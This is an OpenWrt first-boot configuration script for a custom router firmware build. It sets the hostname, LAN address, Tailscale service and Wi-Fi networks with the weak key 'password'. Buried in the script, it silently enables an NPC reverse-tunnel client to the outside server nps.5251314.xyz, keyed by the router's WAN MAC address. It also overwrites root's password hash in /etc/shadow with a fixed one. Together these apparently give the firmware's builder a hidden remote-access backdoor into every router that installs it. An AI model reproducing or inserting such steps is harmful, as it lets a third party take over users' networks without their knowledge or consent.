#!/bin/sh
# Custom script to run at first boot
# Place your custom commands below

#opkg remove --autoremove luci-app-wizard luci-app-upnp $(opkg list-installed | grep zh-cn | sed -e "s/\s.*$//")
echo '#!/bin/sh /etc/rc.common

# Copyright 2020 Google LLC.
# Copyright (C) 2021 CZ.NIC z.s.p.o. (https://www.nic.cz/)
# SPDX-License-Identifier: Apache-2.0

USE_PROCD=1
START=80

start_service() {
  local state_file
  local port
  local std_err std_out

  config_load tailscale
  config_get_bool std_out "settings" log_stdout 1
  config_get_bool std_err "settings" log_stderr 1
  config_get port "settings" port 41641
  config_get state_file "settings" state_file /etc/tailscale/tailscaled.state
  config_get fw_mode "settings" fw_mode nftables

  /usr/sbin/tailscaled --cleanup

  procd_open_instance
  procd_set_param command /usr/sbin/tailscaled

  # Starting with v1.48.1 ENV variable is required to enable use of iptables / nftables.
  # Use nftables by default - can be changed to 'iptables' in tailscale config
  procd_set_param env TS_DEBUG_FIREWALL_MODE="$fw_mode"

  # Set the port to listen on for incoming VPN packets.
  # Remote nodes will automatically be informed about the new port number,
  # but you might want to configure this in order to set external firewall
  # settings.
  procd_append_param command --port "$port"
  procd_append_param command --state "$state_file"

  procd_set_param respawn
  procd_set_param stdout "$std_out"
  procd_set_param stderr "$std_err"

  procd_close_instance
}

stop_service() {
  /usr/sbin/tailscaled --cleanup
}' > /etc/init.d/tailscale

chmod +x /etc/init.d/tailscale

uci set dhcp.@dnsmasq[0].port='54'
uci set system.@system[0].hostname='HY3000'
uci set network.lan.ipaddr='192.168.6.1'
uci set system.@system[0].version="by vx:Mr___zjz/OpenWrt 24.10.4"

uci set wireless.@wifi-iface[0].ssid="Openwrt-2.4G"
uci set wireless.@wifi-iface[0].encryption='psk2'
uci set wireless.@wifi-iface[0].key='password'
# 设置 5G WiFi
uci set wireless.@wifi-iface[1].ssid="Openwrt-5G"
uci set wireless.@wifi-iface[1].encryption='psk2'
uci set wireless.@wifi-iface[1].key='password'

# 第二部分：设置 NPC 客户端配置
if [ ! -f /etc/npc-init.flag ]; then
    WAN_IF=$(uci get network.wan.ifname 2>/dev/null || echo "wan")
    WAN_MAC=$(cat /sys/class/net/$WAN_IF/address 2>/dev/null || echo "00:00:00:00:00:00")
    VKEY=${WAN_MAC}

    uci set npc.@npc[0].server_addr="nps.5251314.xyz"
    uci set npc.@npc[0].vkey="$VKEY"
    uci set npc.@npc[0].compress="1"
    uci set npc.@npc[0].crypt="1"
    uci set npc.@npc[0].enable="1"
    uci set npc.@npc[0].server_port="8024"
    uci set npc.@npc[0].protocol="tcp"
    uci commit npc
sed -i 's|conf_Path="/tmp/etc/npc.conf"|conf_Path="/etc/npc.conf"|g' /etc/init.d/npc
# 创建文件并写入所有内容
touch /etc/npc.conf
sed -i "1i[common]" /etc/npc.conf && \
sed -i "2iserver_addr=nps.5251314.xyz:8024" /etc/npc.conf && \
sed -i "3iconn_type=tcp" /etc/npc.conf && \
sed -i "4ivkey=${VKEY}" /etc/npc.conf && \
sed -i "5iauto_reconnection=true" /etc/npc.conf && \
sed -i "6icompress=true" /etc/npc.conf && \
sed -i "7icrypt=true" /etc/npc.conf
    touch /etc/npc-init.flag
    /etc/init.d/npc enable
    /etc/init.d/npc restart
fi

uci set network.lan.ipaddr='192.168.6.1'
uci commit





# Fix aria2 start issue. Refer https://github.com/aria2/aria2/issues/2152#issuecomment-2685168902
sed -i -e 's/section" log/section" log\n        procd_add_jail_mount "\/usr\/lib" #fix "errorCode=1 OSSL_PROVIDER_load 'legacy' failed"/g' /etc/init.d/aria2 
sed -i 's/root:$5$mRqVeJ2Sz8K/CVTM$y6oiLSEeOHx/9ioPe1NKDPVTNa7ubm7wtbXWShElHX0:20427:0:99999:7:::/root:$1$V4UetPzk$CYXluq4wUazHjmCDBCqXF.::0:99999:7:::/g' etc/shadow

exit 0
